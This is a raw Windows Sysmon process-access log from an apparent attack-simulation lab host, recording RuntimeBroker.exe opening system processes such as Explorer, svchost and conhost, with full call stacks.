13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7D00-00000000A301}4172C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FD-6005-FF04-00000000A301}2584C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-F904-00000000A301}2860C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7D00-00000000A301}4172C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FD-6005-FF04-00000000A301}2584C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-F904-00000000A301}2860C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 